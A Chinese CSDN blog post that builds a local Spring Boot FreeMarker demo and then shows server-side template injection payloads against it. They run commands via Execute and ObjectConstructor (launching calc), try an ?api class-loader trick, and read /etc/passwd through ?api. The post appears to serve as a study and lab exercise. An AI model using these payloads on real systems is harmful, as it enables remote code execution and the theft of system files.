Freemarker代码

于 2023-08-29 00:55:47 发布
阅读量113 收藏
点赞数
分类专栏: JAVA 文章标签: web安全 java 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/132551001
版权

中文文档
http://freemarker.foofun.cn/ref_depr_numerical_interpolation.html

payload构造:
https://teamssix.com/211203-200441.html#toc-heading-4

正常使用方法:https://blog.csdn.net/zenyangqiming/article/details/108415063

写Freemarker项目

我们先来正向写Freemarker项目
application.properties

# 模板后缀名
spring.freemarker.suffix=.ftl
# 文档类型
spring.freemarker.content-type=text/html
# 页面编码
spring.freemarker.charset=UTF-8
# 页面缓存
spring.freemarker.cache=false
# 模板路径
spring.freemarker.template-loader-path=classpath:/templates/

server.port=8886

index.ftl

<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <title>FreeMarkerdemo</title>
</head>
<body>
<table>
    <tr>
        <td>网络ID</td>
        <td>公众号名称</td>
    </tr>
    <tr>
        <td>${user.id}</td>
        <td>${user.name}</td>
    </tr>
</table>
</body>
</html>

FreemarkerController

package com.example.freemarker;

import org.springframework.stereotype.Controller;
import org.springframework.ui.ModelMap;
import org.springframework.web.bind.annotation.RequestMapping;

import java.util.HashMap;
import java.util.Map;

@Controller
public class FreemarkerController {
    @RequestMapping("/freemarker/index")
    public String fmIndex(ModelMap modelMap){
        Map<String,String> map = new HashMap<>();
        map.put("id","666");
        map.put("name","qiezi");

        //给模板添加上面的属性值
        modelMap.addAttribute("user",map);
        return "index";
    }
}

运行项目,如下在这里插入图片描述

命令执行攻击

new函数利用

利用方法一(RCE)

<#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}

在这里插入图片描述
访问http://127.0.0.1:8886/freemarker/index路径时候,会命令执行弹出calc

利用方法二(RCE)


<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc").start()}

在这里插入图片描述

api函数利用

利用方法一(RCE)

<#assign classLoader=object?api.class.getClassLoader()>${classLoader.loadClass("Evil.class")}

在这里插入图片描述
可以看到没有成功
我们看看原因,如下:
在这里插入图片描述
在这里插入图片描述
查看版本发现是2.3.31版本,freemarker在在 2.3.22 版本之后apiBuiltinEnabled 默认为 false,apiBuiltinEnabled 为true时候才能生效

利用方法二(任意文件读取)

<#assign uri=object?api.class.getResource("/").toURI()> 
    <#assign input=uri?api.create("file:///etc/passwd").toURL().openConnection()> 
    <#assign is=input?api.getInputStream()> 
    FILE:[<#list 0..999999999 as _> 
        <#assign byte=is.read()> 
        <#if byte == -1> 
            <#break> 
         </#if> 
    ${byte}, </#list>]

在这里插入图片描述

番茄酱料
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
freemarker代码实现
Emily的博客
06-11 540
package com.wisezone.test; 2 3 import java.io.IOException; 4 5 import javax.servlet.ServletException; 6 import javax.servlet.annotation.WebServlet; 7 import javax.servlet.http.HttpServlet; 8
freemarker
HelloWorld
04-27 314
一、  概述 freemarkerjava编写的一款模版引擎,是一种基于模版和要改变的数据,并用于输出文本(html、电子邮件、配置文件和源代码等)的通用工具。与web容器无关,即在web运行时,它并不知道servlet或HTTP。不仅可以用于表现层的实现技术,还可以用于生成XML,JPS或java等。在企业中,一般用于生成静态页面或是页面展示。 二、  使用freemarker 导入ja...
FreeMark登录界面
苏源的博客
09-21 1695
Insert title here                                                                       用户名                                                           
freemarker代码
02-05
FreeMarker是一个用Java语言编写的模板引擎,它基于模板来生成文本输出。FreeMarkerWeb容器无关,即在Web运行时,它并不知道Servlet或HTTP。它不仅可以用作表现层的实现技术,而且还可以用于生成XML,JSP或Java
Freemarker源码解析
shuhuai007的专栏
10-21 3406
http://aixiangct.blog.163.com/blog/static/915224612011413113013687/   FreeMarker 自定义模版文件加载器        模版文件加载器用来告诉 FreeMarker 引擎到什么地方去加载模版文件。 FreeMarker 自带了三种文件加载器,分别是:文件目录加载器、类路径加载器以及 Web 上下文加载器。当在 We
freemarker 源码、中文API、 freemarker Myeclipse 编辑器
01-21
包括freemarker源码、freemarker中文API、freemarker myeclipse编辑器及编辑器安装提示
freemarker 源码分析
feiyan35488的专栏
09-14 258
正在研究freemarker源码
使用freemarker模板生成简单的代码
madman
09-12 999
main方法 package com.imobapy.base.util; import freemarker.template.Configuration; import freemarker.template.Template; import freemarker.template.TemplateException; import java.io.File; import java.io.FileOutputStream; import java.io.IOException; import java
基于spring boot freemarker代码生成器
01-26
代码生成器支持model、Mapper、Dao、Service、ServiceImpl、Controller 一次性的生成,支持同时生成多张表,此代码生成器依赖JAR包比较少,除了必用Freemarker 和JDBC之外基本上完全个人编写
freemarker代码
12-26
本自学代码资源将帮助你深入理解Freemarker的工作原理及其在实际项目中的应用。 一、Freemarker基本概念 1. 模板:Freemarker的核心是模板,模板是HTML或其他文本文件,其中包含Freemarker表达式和指令,这些元素会...
Freemarker及源代码及教程
07-08
Freemaker是一个强大的模板引擎,相比velocity而言,其强大的过程调用、递归和闭包回调功能让freemaker可以完成几乎所有我们所想的功能。从个人看法而言,freemaker完全有能力作为MDA的代码辅助生成工具。 <br><br>
freemarker模板
08-13
NULL 博文链接:https://gaochunhu.iteye.com/blog/2299998
freemarker2.3源码以及build之后的(包含build所需jar包)
01-15
freemarker2.3源码以及build之后的(包含build所需jar包)
FreeMarker教你如何生成html静态页面源码
05-10
FreeMarker教你如何生成html静态页面源码
Freemarker代码生成器实体映射xml的ftl模板文件
07-03
Freemarker代码生成器是一种强大的工具,用于自动生成符合特定需求的代码,它可以极大地提高开发效率,减少重复劳动。在Java开发中,特别是在企业级应用中,XML文件常常被用来作为配置文件,其中包含了对象与数据库...
springboot 整合 freemarker代码实例
08-25
在给出的代码实例中,可以看到Spring Boot的父依赖、Spring Boot的FreeMarker starter、Lombok、OkHttp3、Apache Commons IO以及Spring Boot的Web和测试相关依赖。这些依赖用于支持FreeMarker模板的解析、HTTP请求、...
springmvc+mybatis 和一个简单的freemarker代码生成工具
04-06
是用于构建MVC(Model-View-Controller)架构的轻量级Web框架,而MyBatis则是一个优秀的持久层框架,它简化了数据库操作,FreeMarker则是一个动态模板引擎,常用于生成视图层的HTML代码。接下来,我们将深入探讨这三...
Freemarker源码分析(11)core.MarkupOutputFormat<MO>及其子类
Vakie的博客
12-19 246
2021SC@SDUSC 总览图 MarkupOutputFormat 代码: public abstract class MarkupOutputFormat<MO extends TemplateMarkupOutputModel> extends OutputFormat { protected MarkupOutputFormat() { // Only to decrease visibility } public abstract MO
freemarker代码生成器
最新发布
08-05
FreeMarker是一款模板引擎,用于根据模板和数据生成输出文本,如HTML网页、电子邮件、配置文件、源代码等。代码生成器是使用模板和数据合成机制,通过生成静态的HTML代码或其他类型的文件来满足特定的需求。通过使用FreeMarker代码生成器,可以通过初始化环境、设置数据和模板文件,生成相应的文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值